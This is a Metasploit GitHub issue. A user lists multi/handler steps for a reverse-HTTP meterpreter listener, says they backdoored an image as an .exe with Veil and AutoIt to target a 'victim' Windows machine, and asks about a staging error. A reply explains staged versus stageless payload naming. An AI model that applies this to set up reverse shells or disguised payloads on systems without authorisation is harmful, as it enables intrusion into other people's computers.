Metasploit-framework: Staging failed MSF cosole PLEASE HELP ME

Steps to reproduce

How'd you do it?

1. I run msfconsole
2. use exploit/multi/handler to start the listener
3. set the LHOST(my ip adress)
   4.set the LPORT(8080)
   5 .set payload to : windows/meterpeter-reverse-http
   6.exploit(start the listener)
   The victim OS is windows I'm work with kali linux the payload created by Veil3F and I use auto it to backdoored an image by transform my script to ".exe"

Expected behavior

when I start the listener and I detect a connection from the victim msfconsole the meterpeter start.

Current behavior

instead he show me this error : show me this error :
http://192.168.1.5:8080 handling request from 192.168.1.2; (UUID: v0rq05pb) Staging failed. This can occur when stageless listeners are used with staged payload

System stuff

Metasploit version

Framework: 4.17.1-dev
Console : 4.17.1-dev

I installed Metasploit with:

When I install the .iso image I found it installed

Are you sure you're not confusing stageless and staged payloads?
E.g windows/meterpreter/reverse_tcp vs windows/meterpreter_reverse_tcp

General guideline is type/direction_transport is staged because of the /, and type_direction_transport is stageless because of the _.
